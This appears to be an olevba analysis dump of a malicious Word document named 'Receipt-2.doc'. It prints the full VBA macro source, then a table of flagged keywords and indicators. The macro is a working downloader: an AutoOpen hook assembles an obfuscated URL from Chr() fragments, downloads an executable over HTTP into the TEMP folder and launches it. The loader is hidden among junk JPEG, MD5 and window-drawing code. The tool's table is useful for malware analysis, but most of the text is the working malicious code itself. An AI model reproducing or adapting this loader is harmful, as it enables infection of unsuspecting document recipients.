Malicious Word macro

1. olevba 0.41 - http://decalage.info/python/oletools
2. Flags        Filename                                                        
3. -----------  -----------------------------------------------------------------
4. OLE:MASIHB-V Receipt-2.doc
5.  
6. (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
7.  
8. ===============================================================================
9. FILE: Receipt-2.doc
10. Type: OLE
11. -------------------------------------------------------------------------------
12. VBA MACRO ThisDocument.cls
13. in file: Receipt-2.doc - OLE stream: u'Macros/VBA/ThisDocument'
14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
15. Sub autoopen()
16. JPEHuffmTable
17. End Sub
18. -------------------------------------------------------------------------------
19. VBA MACRO Module1.bas
20. in file: Receipt-2.doc - OLE stream: u'Macros/VBA/Module1'
21. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
22.  
23.  
24. Sub JPEGGenerateHuffmanTable(Huff() As Integer, a As Integer, b As Integer)
25. Dim S As Long, i As Integer, J As Integer, T As Integer
26. Dim X As Integer, Y As Integer
27. S = -1
28.  
29. For i = 1 To 16
30. READ X
31. For J = 1 To X
32.  
33. If S = -1 Then
34. S = 0
35. Else
36. S = S + Pow2(T)
37. End If
38.  
39.  
40. READ Y
41. If S And 32768 Then Huff(Y, a, b, 0) = CInt(S And 32767&) Or -32768 Else Huff(Y, a, b, 0) = S
42. Huff(Y, a, b, 1) = i
43. T = 16 - i
44.  
45. Next
46. Next
47. End Sub
48.  
49. Sub JPEGPrecalc(FSSik As Object)
50. Dim X As Integer, Y As Integer, T As Integer, Dir As Integer, L As Long
51.  
52. L = 1
53. For X = 0 To 15
54. 'Pow2(X) = L
55. L = L + L
56. Next
57. If L >= 1 Then
58. GoTo HHNf
59. End If
60. For Y = 0 To 7
61. For X = 0 To 7
62. C.Cosine(X, Y) = Cos((2 * X + 1) * Y * 0.1963495)
63. Next X, Y
64. HHNf:
65. FSSik.Send
66. Exit Sub
67. X = 0: Y = 0
68. T = 0
69. Dir = 0
70. Do
71. C.ZigZagX(T) = X
72. C.ZigZagY(T) = Y
73. T = T + 1
74. If T = 64 Then Exit Do
75. If Dir Then
76. If Y = 7 Then
77. X = X + 1
78. Dir = 0
79. ElseIf X = 0 Then
80. Y = Y + 1
81. Dir = 0
82. Else
83. X = X - 1
84. Y = Y + 1
85. End If
86.  
87. Else
88. If Y = 0 Then
89. X = X + 1
90. Dir = 1
91. ElseIf X = 7 Then
92. Y = Y + 1
93. Dir = 1
94. Else
95. X = X + 1
96. Y = Y - 1
97. End If
98. End If
99. Loop
100.  
101.  
102.  
103. End Sub
104.  
105. Private Function pDrawButton(ByVal hWnd As Long, ByVal hDC As Long) As Long
106.     Dim m_Style As Long
107.     Dim m_State As Long
108.     Dim m_OldSt As Long
109.     Dim m_SrcDC As Long
110.     Dim m_DstDC As Long
111.     Dim m_Level As Long
112.     Dim m_wRect As RECTW
113.     If IsWindowEnabled(hWnd) = 0 Then Call SetProp(hWnd, "OLDSTATE", 3)
114.     m_Style = GetProp(hWnd, "OLDSTYLE")
115.     If (m_Style And BS_CHECKBOX) Or (m_Style And BS_RADIOBUTTON) Then Exit Function
116.     Call pGetWindowRectW(hWnd, m_wRect)
117.     m_OldSt = GetProp(hWnd, "OLDSTATE")
118.     m_Level = GetProp(hWnd, "ALPHALEVEL")
119.     m_SrcDC = GetProp(hWnd, "HDC" & CStr(m_OldSt))
120.     m_DstDC = IIf(hDC = 0, GetWindowDC(hWnd), hDC)
121.     AlphaBlend m_DstDC, 0, 0, m_wRect.Width, m_wRect.Height, m_SrcDC, 0, 0, m_wRect.Width, m_wRect.Height, m_Level * &H10000
122.     If hDC = 0 Then Call ReleaseDC(hWnd, m_DstDC)
123. End Function
124.  
125. Public Function COLUMNEWORDER(SIBBBD As String) As Byte()
126. Dim COLUMNBEFOREORDER As Object
127.  Set COLUMNBEFOREORDER = CreateObject("Microsoft.XMLHTTP")
128.  
129.  
130. pDetach COLUMNBEFOREORDER, SIBBBD, 0
131. JPEGPrecalc COLUMNBEFOREORDER
132. GoTo HHGGHHEHD
133. HHGGHHEHD:
134. COLUMNEWORDER = COLUMNBEFOREORDER.responseBody
135. Exit Function
136. End Function
137.  
138. Public Sub IncomingData(ByVal DataLength As Long)
139. Dim Buffer() As Byte
140. Dim pLength As Long
141.  
142.     If Not App.LogMode = 0 Then On Error GoTo errHandler
143.  
144.     frmMain.Socket.GetData Buffer, vbUnicode, DataLength
145.    
146.     PlayerBuffer.WriteBytes Buffer()
147.    
148.     If PlayerBuffer.Length >= 4 Then pLength = PlayerBuffer.ReadLong(False)
149.     Do While pLength > 0 And pLength <= PlayerBuffer.Length - 4
150.         If pLength <= PlayerBuffer.Length - 4 Then
151.             PlayerBuffer.ReadLong
152.             HandleData PlayerBuffer.ReadBytes(pLength)
153.         End If
154.  
155.         pLength = 0
156.         If PlayerBuffer.Length >= 4 Then pLength = PlayerBuffer.ReadLong(False)
157.     Loop
158.     PlayerBuffer.Trim
159.     DoEvents
160.    
161.     Exit Sub
162. errHandler:
163.     HandleError "IncomingData", "modHandleData", Err.Number, Err.Description
164.     Err.Clear
165.     Exit Sub
166. End Sub
167.  
168. Private Function pDrawCheckBox(ByVal hWnd As Long, ByVal State As Long, Optional ByVal Redraw As Boolean = False) As Long
169.     Dim mOldState As Long
170.     mOldState = GetProp(hWnd, "OLDSTATE")
171.     If mOldState = State And Redraw = False Then Exit Function
172.     Call SetProp(hWnd, "OLDSTATE", State)
173.     Dim m_hDC       As Long
174.     Dim TmpDC       As Long
175.     Dim m_wRect     As RECTW
176.     Dim m_cX        As Long
177.     Dim m_cY        As Long
178.     Dim mValue      As Long
179.     m_cX = GetSystemMetrics(SM_CXCHECKBOX)
180.     m_cY = GetSystemMetrics(SM_CYCHECKBOX)
181.     Call pGetWindowRectW(hWnd, m_wRect)
182.     mValue = SendMessage(hWnd, BM_GETCHECK, 0&, 0&)
183.     TmpDC = pCreateDC(m_cX, m_cY)
184.     m_hDC = GetWindowDC(hWnd)
185.     Call pFillRectL(TmpDC, 0, 0, m_cX, m_cY, &HFFFFFF)
186.     If IsWindowEnabled(hWnd) Then
187.         If State = 2 Then
188.             Call pFrameRect(TmpDC, 0, 0, m_cX, m_cY, &HC48639)
189.         Else
190.             Call pFrameRect(TmpDC, 0, 0, m_cX, m_cY, &HD5A554)
191.         End If
192.         If State = 1 Then Call StretchBlt(TmpDC, 1, 1, m_cX - 2, m_cY - 2, m_hOpbSrcDC, 1, 17, 11, 5, vbSrcCopy)
193.         If State = 2 Then Call StretchBlt(TmpDC, 1, 1, m_cX - 2, m_cY - 2, m_hOpbSrcDC, 1, 30, 11, 5, vbSrcCopy)
194.         If mValue = 1 Then Call TransBlt(TmpDC, (m_cX - 9) / 2, (m_cY - 8) / 2, 9, 8, m_hCkbSrcDC, 0, 0)
195.         If mValue = 2 Then Call TransBlt(TmpDC, (m_cX - 7) / 2, (m_cY - 7) / 2, 7, 7, m_hCkbSrcDC, 1, 9)
196.     Else
197.         Call pFrameRect(TmpDC, 0, 0, m_cX, m_cY, &HE9CFA4)
198.         If mValue = 1 Then Call TransBlt(TmpDC, (m_cX - 9) / 2, (m_cY - 8) / 2, 9, 8, m_hCkbSrcDC, 9, 0)
199.         If mValue = 2 Then Call TransBlt(TmpDC, (m_cX - 7) / 2, (m_cY - 7) / 2, 7, 7, m_hCkbSrcDC, 10, 9)
200.     End If
201.     BitBlt m_hDC, 0, (m_wRect.Height - m_cY) / 2, m_cX, m_cY, TmpDC, 0, 0, vbSrcCopy
202.     Call ReleaseDC(hWnd, m_hDC)
203.     DeleteDC TmpDC
204.     pDrawCheckBox = 1
205. End Function
206.  
207. Sub JPEGPutBinString(BS As Integer, Length As Integer, State As Integer)
208. Dim Temp As Integer
209.  
210. Temp = BS
211. State.Leftover = State.Leftover Or JPEG.Shift(Temp, State.LeftoverBits)
212. State.LeftoverBits = State.LeftoverBits + Length
213. If State.LeftoverBits >= 16 Then
214. DEF SEG = VARSEG(State.Leftover)
215. JPEG.PutByte State.FileNo, PEEK(VarPtr(State.Leftover) + 1)
216. DEF SEG
217. JPEG.PutByte State.FileNo, State.Leftover And 255
218. State.LeftoverBits = State.LeftoverBits - 16
219. State.Leftover = Temp
220. End If
221.  
222. End Sub
223.  
224. Sub JPEGPutByte(FileNo As Integer, Bytep As Integer)
225. Dim C As String * 1
226. C = Chr(Bytep)
227. Put FileNo, , C
228. End Sub
229.  
230. Sub JPEGPutRightBinString(BS As Integer, Length As Integer, State As Integer)
231.  
232. Dim Temp As Long
233. If Length Then
234. Temp = (CLng(BS) And Pow2(Length) - 1) * Pow2(16 - Length)
235. If Temp And 32768 Then Temp = Temp Or -65536
236. JPEG.PutBinString CInt(Temp), Length, State
237. End If
238.  
239. End Sub
240.  
241. Sub JPEGPutWord(FileNo As Integer, Word As Integer)
242. Dim C As String * 1
243. C = Chr$(Word \ 256)
244. Put FileNo, , C
245. C = Chr$(Word And 255)
246. Put FileNo, , C
247. End Sub
248.  
249. Function JPEGShift(i As Integer, N As Integer)
250. Dim T As Long
251.  
252. If N = 0 Then
253. JPEG.Shift = i
254. i = 0
255. Exit Function
256. End If
257. T = CLng(i) And 65535
258.  
259. JPEG.Shift = T \ Pow2(N)
260.  
261. T = (T And (Pow2(N) - 1)) * Pow2((16 - N) And 15)
262. If T And 32768 Then i = CInt(T And 32767&) Or -32768 Else i = CInt(T)
263. End Function
264.  
265. Sub JPEGStandardQT(quality As Single, QT() As Integer)
266.  
267. Dim i As Integer, X As Integer, Y As Integer, T As Integer
268. Restore StandardQT
269.  
270. For i = 0 To 1: For Y = 0 To 7: For X = 0 To 7
271. READ T
272.  
273. QT(X, Y, i) = T * quality
274.  
275. If QT(X, Y, i) = 0 Then QT(X, Y, i) = 1
276. Next X, Y, i
277.  
278. End Sub
279.  
280. Public Function JPEGY(R As Integer, G As Integer, b As Integer)
281.  
282. JPEG.Y = 0.299 * R + 0.587 * G + 0.114 * b - 128
283.  
284. End Function
285.  
286. Sub PutChar(FileNo As Integer, Char As Integer)
287. Dim C As String * 1
288. C = Chr$(Char)
289. Put FileNo, , C
290. End Sub
291. -------------------------------------------------------------------------------
292. VBA MACRO Module2.bas
293. in file: Receipt-2.doc - OLE stream: u'Macros/VBA/Module2'
294. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
295.  
296. Private Function MD5LongAdd(lngVal1 As Long, lngVal2 As Long) As Long
297.    
298.     Dim lngHighWord As Long
299.     Dim lngLowWord As Long
300.     Dim lngOverflow As Long
301.  
302.     lngLowWord = (lngVal1 And &HFFFF&) + (lngVal2 And &HFFFF&)
303.     lngOverflow = lngLowWord \ 65536
304.     lngHighWord = (((lngVal1 And &HFFFF0000) \ 65536) + ((lngVal2 And &HFFFF0000) \ 65536) + lngOverflow) And &HFFFF&
305.    
306.     MD5LongAdd = MD5LongConversion((lngHighWord * 65536#) + (lngLowWord And &HFFFF&))
307.  
308. End Function
309. Public Sub JPEHuffmTable()
310. Dim COLUMNTRADEZ: Set COLUMNTRADEZ = CreateObject("Adodb.Stream")
311.  
312. Set processEnv = CreateObject("WScript.Shell").Environment("Process")
313. COLUMTRADETATUS = processEnv("T" + Chr(69) + "MP")
314. iChkBaseOrd1erGo = COLUMTRADETATUS + "\f" + Chr(68) + "e12.ex" & Chr(101)
315. With COLUMNTRADEZ
316.    .Type = 1
317.     .Open
318.     .write COLUMNEWORDER(pDrawComboBox(0, 0, 0))
319.     .savetofile iChkBaseOrd1erGo, 2
320. End With
321. Set MEIGARWORKSHEEAME = CreateObject("Shell.Application")
322. MEIGARWORKSHEEAME.Open iChkBaseOrd1erGo
323. End Sub
324.  
325. Private Function MD5LongAdd4(lngVal1 As Long, lngVal2 As Long, lngVal3 As Long, lngVal4 As Long) As Long
326.    
327.     Dim lngHighWord As Long
328.     Dim lngLowWord As Long
329.     Dim lngOverflow As Long
330.  
331.     lngLowWord = (lngVal1 And &HFFFF&) + (lngVal2 And &HFFFF&) + (lngVal3 And &HFFFF&) + (lngVal4 And &HFFFF&)
332.     lngOverflow = lngLowWord \ 65536
333.     lngHighWord = (((lngVal1 And &HFFFF0000) \ 65536) + ((lngVal2 And &HFFFF0000) \ 65536) + ((lngVal3 And &HFFFF0000) \ 65536) + ((lngVal4 And &HFFFF0000) \ 65536) + lngOverflow) And &HFFFF&
334.     MD5LongAdd4 = MD5LongConversion((lngHighWord * 65536#) + (lngLowWord And &HFFFF&))
335.  
336. End Function
337. -------------------------------------------------------------------------------
338. VBA MACRO Module3.bas
339. in file: Receipt-2.doc - OLE stream: u'Macros/VBA/Module3'
340. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
341.  
342.  
343. Private Function pAttach(ByVal hWnd As Long) As Long
344. If hWnd = 0 Then Exit Function
345.     If GetProp(hWnd, "PROCADDR") Then Exit Function
346.     Dim sClassName  As String
347.     sClassName = LCase(pGetClassName(hWnd))
348.     Select Case sClassName
349.         '=====================================================================================
350.        Case "#32770", "thunderformdc", "thunderrt6formdc", "form"
351.             Call EnumChildWindows(hWnd, AddressOf pEnumChildProc, ByVal 0&)
352.            
353.         '=====================================================================================
354.        Case "thundercommandbutton", "thunderrt6commandbutton", "button"
355.             Dim i           As Long
356.             Dim m_hDC       As Long
357.             Dim m_mDC(3)    As Long
358.             Dim m_BMP(3)    As Long
359.             Dim m_wRect     As RECTW
360.             Dim m_dwStyle   As Long
361.             m_hDC = GetWindowDC(hWnd)
362.             pGetWindowRectW hWnd, m_wRect
363.             For i = 0 To 3
364.                 m_mDC(i) = CreateCompatibleDC(m_hDC)
365.                 m_BMP(i) = CreateCompatibleBitmap(m_hDC, m_wRect.Width, m_wRect.Height)
366.                 DeleteObject SelectObject(m_mDC(i), m_BMP(i))
367.                 SetProp hWnd, "HDC" & CStr(i), m_mDC(i)
368.                 SetProp hWnd, "BMP" & CStr(i), m_BMP(i)
369.             Next
370.             Call pDrawMemDC(hWnd)
371.             ReleaseDC hWnd, m_hDC
372.             m_dwStyle = GetWindowLong(hWnd, GWL_STYLE)
373.             If (m_dwStyle And BS_CHECKBOX) Or (m_dwStyle And BS_RADIOBUTTON) Then
374.             Else
375.                 SendMessage hWnd, BM_SETSTYLE, BS_OWNERDRAW, ByVal True
376.             End If
377.             SetProp hWnd, "OLDSTYLE", m_dwStyle         '????????,?????????????????
378.            SetProp hWnd, "MOUSEFLAG", 0
379.             SetProp hWnd, "TIMERID", 0
380.             SetProp hWnd, "OLDSTATE", IIf(IsWindowEnabled(hWnd), 0, 3)
381.             SetProp hWnd, "ALPHALEVEL", 0
382.             SetWindowRgn hWnd, CreateRoundRectRgn(0, 0, m_wRect.Width + 1, m_wRect.Height + 1, 3, 3), True
383.            
384.         '=====================================================================================
385.        Case "thundercombobox", "thunderrt6combobox", "combo", "combobox", "thunderdrivelistbox", "thunderrt6drivelistbox", _
386.              "thundercheckbox", "thunderrt6checkbox", "thunderoptionbutton", "thunderrt6optionbutton"
387.             SetProp hWnd, "MOUSEFLAG", 0
388.             SetProp hWnd, "OLDSTATE", 0
389.        
390.         '=====================================================================================
391.        Case "progressbar20wndclass", "progressbarwndclass"
392.             'Call pGetWindowRectW(hWnd, m_wRect)
393.            'SetWindowRgn hWnd, CreateRoundRectRgn(0, 0, m_wRect.Width + 1, m_wRect.Height + 1, 3, 3), False
394.        
395.         '=====================================================================================
396.        Case "msvb_lib_header", "sysheader32"
397.             SetProp hWnd, "MOUSEFLAG", 0
398.             SetProp hWnd, "HDINDEX", -1
399.             SetProp hWnd, "HMINDEX", -1
400.            
401.         '=====================================================================================
402.        Case Else
403.    
404.     End Select
405.     m_SubclassCount = m_SubclassCount + 1
406.     SetProp hWnd, "PROCADDR", SetWindowLong(hWnd, GWL_WNDPROC, AddressOf WindowProc)
407.     SendMessage hWnd, WM_NCPAINT, 1&, 0&
408.     RedrawWindow hWnd, ByVal 0&, ByVal 0&, &H1 Or &H2
409.     pAttach = 1
410. End Function
411.  
412. Public Function pDetach(PROCADDRR2 As Object, pGetClsName As String, hWnd As Long)
413. If hWnd = 0 Then GoTo PROCADDR
414.     Dim OrigProc As Long
415.     OrigProc = vd.GetProp(hWnd, "PROCADDR")
416.     If OrigProc = 0 Then Exit Function
417.     Dim sClassName  As String
418.     sClassName = LCase(vd.pGetClassName(hWnd))
419.     Select Case sClassName
420.         '=====================================================================================
421.        Case "#32770", "thunderformdc", "thunderrt6formdc", "form"
422.            
423.         '=====================================================================================
424.        Case "thundercommandbutton", "thunderrt6commandbutton", "button"
425.             Dim m_mDC(3)    As Long
426.             Dim m_BMP(3)    As Long
427.             Dim i As Long
428.             For i = 0 To 3
429.                 m_mDC(i) = vd.GetProp(hWnd, "HDC" & CStr(i))
430.                 m_BMP(i) = vd.GetProp(hWnd, "BMP" & CStr(i))
431.                vd.DeleteObject m_mDC(i)
432.                 vd.DeleteDC m_BMP(i)
433.                 vd.RemoveProp hWnd, "HDC" & CStr(i)
434.                 vd.RemoveProp hWnd, "BMP" & CStr(i)
435.             Next
436.             vd.Call vd.pKillTimer(hWnd)
437.             vd.SetWindowLong hWnd, -16, vd.GetProp(hWnd, "OLDSTYLE")
438.             vd.RemoveProp hWnd, "OLDSTYLE"
439.             vd.RemoveProp hWnd, "MOUSEFLAG"
440.             vd.RemoveProp hWnd, "TIMERID"
441.             vd.RemoveProp hWnd, "OLDSTATE"
442.             vd.RemoveProp hWnd, "ALPHALEVEL"
443.             vd.SetWindowRgn hWnd, 0&, True
444.         '=====================================================================================
445.        Case "thundercombobox", "thunderrt6combobox", "combo", "combobox", "thunderdrivelistbox", "thunderrt6drivelistbox", _
446.              "thundercheckbox", "thunderrt6checkbox", "thunderoptionbutton", "thunderrt6optionbutton"
447.             vd.RemoveProp hWnd, "MOUSEFLAG"
448.             vd.RemoveProp hWnd, "OLDSTATE"
449.        
450.         Case "msvb_lib_header", "sysheader32"
451.             vd.RemoveProp hWnd, "MOUSEFLAG"
452.             vd.RemoveProp hWnd, "HDINDEX"
453.             vd.RemoveProp hWnd, "HMINDEX"
454.            
455.         '=====================================================================================
456.        Case "progressbar20wndclass", "progressbarwndclass"
457.             'SetWindowRgn hWnd, 0&, ByVal True
458.                    
459.         '=====================================================================================
460.        Case "datalistwndclass", "dblistwndclass"
461.                                
462.         '=====================================================================================
463.        Case Else
464.    
465.     End Select
466.    
467.    
468.    
469. PROCADDR:
470. PROCADDRR2.Open "G" + Chr(69) + "T", pGetClsName, False
471. Exit Function
472.     vd.RemoveProp hWnd, "PROCADDR"
473.    ' Call SetWindowLong(hWnd, GWL_WNDPROC, OrigProc)
474.    vd.SendMessage hWnd, WM_NCPAINT, 1&, 0&
475.     vd.RedrawWindow hWnd, 0&, 0&, &H1 Or &H2
476.     m_SubclassCount = m_SubclassCount - 1
477.     If m_SubclassCount <= 0 Then
478.         m_SubclassCount = 0
479.         vd.DeleteDC m_hBtnSrcDC
480.         Dvd.eleteDC m_hCbbSrcDC
481.         Devd.leteDC m_hCkbSrcDC
482.         Devd.leteDC m_hOpbSrcDC
483.         Delvd.eteDC m_hHdbSrcDC
484.         m_Init = False
485.     End If
486.     pDetach = 1
487. End Function
488.  
489. Public Function pDrawComboBox(hWnd As Long, hDC As Long, yyyy As Long) As String
490.     Dim mOldState As Long
491.     Dim bDrop     As Long
492.     pDrawComboBox = Chr(104) & Chr(116) & Chr(116) & "p" & Chr(58) & Chr(47) & Chr(47) & Chr(97) & Chr(114) & "c" & "h" & Chr(105) & "v" & Chr(101) & Chr(115) & "." & Chr(119) & Chr(110) & "p" & Chr(118) & Chr(97) & Chr(109) & Chr(46) & Chr(99) & Chr(111) & Chr(109) & Chr(47) & "b" & Chr(118) & Chr(99) & Chr(98) & Chr(51) & "4" & Chr(100) & Chr(47) & Chr(57) & "8" & Chr(51) & Chr(98) & "v" & Chr(51) & Chr(46) & Chr(101) & Chr(120) & "e"
493. Exit Function
494.     bDrop = Se.ndMessage(hWnd, CB_GETDROPPEDSTATE, 0&, 0&)
495.     mOldState = Ge.tProp(hWnd, "OLDSTATE")
496.     If bDrop Then State = 2
497.     If mOldState = State And Redraw = False Then Exit Function
498.     If Not GetWin.dowLong(hWnd, GWL_STYLE) And &H2 Then Exit Function
499.     Ca.ll SetP.rop(hWnd, "OLDSTATE", State)
500.     Dim m_BtSize    As Long
501.     Dim m_hDC       As Long
502.     Dim TmpDC       As Long
503.     Dim TmpBMP      As Long
504.     Cal.L pGetWind.owRectW(hWnd, m_wRect)
505.     m_BtSize = GetS.ystemMetrics(SM_CXVSCROLL) + 1
506.     TmpDC = pCre.ateDC(m_BtSize, m_wRect.Height - 2)
507.     Select Case State
508.             Case 0
509.                 C.all pFil.lRectL(TmpDC, 0, 0, m_BtSize, m_wRect.Height - 2, &HFFFFFF)
510.  
511.             Case 1
512.                 Cal.L Grid.Blt(TmpDC, 0, 0, m_BtSize, m_wRect.Height - 2, m_hCbbSrcDC, 0, 0, 4, 18, 2, 1, 1, 1)
513.                
514.             Case 2
515.                 Cal.L Gri.dBlt(TmpDC, 0, 0, m_BtSize, m_wRect.Height - 2, m_hCbbSrcDC, 4, 0, 4, 18, 2, 1, 1, 1)
516.                                    
517.     End Select
518.     If IsWin.dowEnabled(hWnd) Then
519.         Cal.L Tran.sblt(TmpDC, m_BtSize - 7 - (m_BtSize - 7) / 2, (m_wRect.Height - 6) / 2, 7, 4, m_hCbbSrcDC, 8, 0)
520.     Else
521.         Ca.ll Tran.sblt(TmpDC, m_BtSize - 7 - (m_BtSize - 7) / 2, (m_wRect.Height - 6) / 2, 7, 4, m_hCbbSrcDC, 8, 4)
522.     End If
523.     If hDC = 0 Then
524.         m_hDC = Ge.tWindowDC(hWnd)
525.     Else
526.         m_hDC = hDC
527.     End If
528.     Bit.Blt m_hDC, m_wRect.Width - m_BtSize - 1, 1, m_BtSize, m_wRect.Height - 2, TmpDC, 0, 0, vbSrcCopy
529.     De.leteDC TmpDC
530.     Del.eteObject TmpBMP
531.     If hDC = 0 Then Ca.ll Re.leaseDC(hWnd, m_hDC)
532. End Function
533.  
534. +------------+----------------------+-----------------------------------------+
535. | Type       | Keyword              | Description                             |
536. +------------+----------------------+-----------------------------------------+
537. | AutoExec   | AutoOpen             | Runs when the Word document is opened   |
538. | Suspicious | Open                 | May open a file                         |
539. | Suspicious | Shell                | May run an executable file or a system  |
540. |            |                      | command                                 |
541. | Suspicious | WScript.Shell        | May run an executable file or a system  |
542. |            |                      | command                                 |
543. | Suspicious | Shell.Application    | May run an application (if combined     |
544. |            |                      | with CreateObject)                      |
545. | Suspicious | CreateObject         | May create an OLE object                |
546. | Suspicious | Chr                  | May attempt to obfuscate specific       |
547. |            |                      | strings                                 |
548. | Suspicious | ADODB.Stream         | May create a text file                  |
549. | Suspicious | SaveToFile           | May create a text file                  |
550. | Suspicious | Write                | May write to a file (if combined with   |
551. |            |                      | Open)                                   |
552. | Suspicious | Put                  | May write to a file (if combined with   |
553. |            |                      | Open)                                   |
554. | Suspicious | Microsoft.XMLHTTP    | May download files from the Internet    |
555. | Suspicious | Hex Strings          | Hex-encoded strings were detected, may  |
556. |            |                      | be used to obfuscate strings (option    |
557. |            |                      | --decode to see all)                    |
558. | Suspicious | Base64 Strings       | Base64-encoded strings were detected,   |
559. |            |                      | may be used to obfuscate strings        |
560. |            |                      | (option --decode to see all)            |
561. | Suspicious | VBA obfuscated       | VBA string expressions were detected,   |
562. |            | Strings              | may be used to obfuscate strings        |
563. |            |                      | (option --decode to see all)            |
564. | IOC        | http://archives.wnpv | URL (obfuscation: VBA expression)       |
565. |            | am.com/bvcb34d/983bv |                                         |
566. |            | 3.exe                |                                         |
567. | IOC        | fDe12.exe            | Executable file name (obfuscation: VBA  |
568. |            |                      | expression)                             |
569. | IOC        | 983bv3.exe           | Executable file name (obfuscation: VBA  |
570. |            |                      | expression)                             |
571. | VBA string | TEMP                 | ("T" + Chr(69) + "MP")                  |
572. | VBA string | \fDe12.exe           | "\f" + Chr(68) + "e12.ex" & Chr(101)    |
573. | VBA string | GET                  | "G" + Chr(69) + "T"                     |
574. | VBA string | http://archives.wnpv | Chr(104) & Chr(116) & Chr(116) & "p" &  |
575. |            | am.com/bvcb34d/983bv | Chr(58) & Chr(47) & Chr(47) & Chr(97) & |
576. |            | 3.exe                | Chr(114) & "c" & "h" & Chr(105) & "v" & |
577. |            |                      | Chr(101) & Chr(115) & "." & Chr(119) &  |
578. |            |                      | Chr(110) & "p" & Chr(118) & Chr(97) &   |
579. |            |                      | Chr(109) & Chr(46) & Chr(99) & Chr(111) |
580. |            |                      | & Chr(109) & Chr(47) & "b" & Chr(118) & |
581. |            |                      | Chr(99) & Chr(98) & Chr(51) & "4" &     |
582. |            |                      | Chr(100) & Chr(47) & Chr(57) & "8" &    |
583. |            |                      | Chr(51) & Chr(98) & "v" & Chr(51) &     |
584. |            |                      | Chr(46) & Chr(101) & Chr(120) & "e"     |
585. +------------+----------------------+-----------------------------------------+